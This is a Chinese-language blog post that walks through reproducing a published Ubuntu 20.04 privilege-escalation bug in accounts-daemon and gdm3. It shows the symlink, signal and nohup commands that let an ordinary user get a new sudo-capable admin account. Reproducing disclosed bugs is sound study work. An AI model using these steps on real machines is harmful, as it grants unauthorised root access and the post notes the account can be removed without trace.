利用cse-2020-16127,cve-2020-16125进行漏洞再现

Ubuntu最新爆出的漏洞:无需系统密码,就能添加新的sudo用户、获取root权限,事后还能删除不留痕迹。

模拟测试

环境:Ubuntu 20.04
当前用户为普通用户权限,没有sudo权限

 利用cse-2020-16127,cve-2020-16125进行漏洞再现

在用户主目录创建一个软连接

Ln -s /dev/zero/ .pam_environment

接下来,在系统设置中打开**“区域和语言”**,然后尝试更改语言

 利用cse-2020-16127,cve-2020-16125进行漏洞再现

 

 

该对话框会冻结,只需忽略它,然后返回到终端即可。

一个名为accounts-daemon的程序正在消耗100%的CPU内核,因此你的计算机可能会变慢并开始变热。

 利用cse-2020-16127,cve-2020-16125进行漏洞再现

在终端中,删除软链接。否则,你可能无法使用自己的帐户!
rm .pam_environment

下一步是将SIGSTOP信号发送到accounts-daemon,阻止它破坏该CPU内核。但是要做到这一点,首先需要知道accounts-daemon的PID

你可以通过运行top来找到PID。由于accounts-daemon被卡在一个无限循环中,因此它很快进入top列表的顶部。

 利用cse-2020-16127,cve-2020-16125进行漏洞再现

接着用kill命令杀死SIGSTOP信号:

Kill  -SIGSTOP 495

然后注销帐户,但首先需要设置一个计时器,保证在注销后重置accounts-daemon。否则,前面的努力都将白费。

Nohup bash -c “sleep 30s; kill -SIGSEGV 495; kill -SIGCONT 495” &

注销后等待几秒钟,让SIGSEGV起效。如果漏洞利用成功,则会显示一系列对话框,让你创建一个新的用户帐户。这个新帐户具有管理员权限,可以运行sudo命令。

 

上一篇:CentOS7 下安装docker


下一篇:虚拟机-- 拉取Nexus镜像出现 request canceled while waiting for connection timeout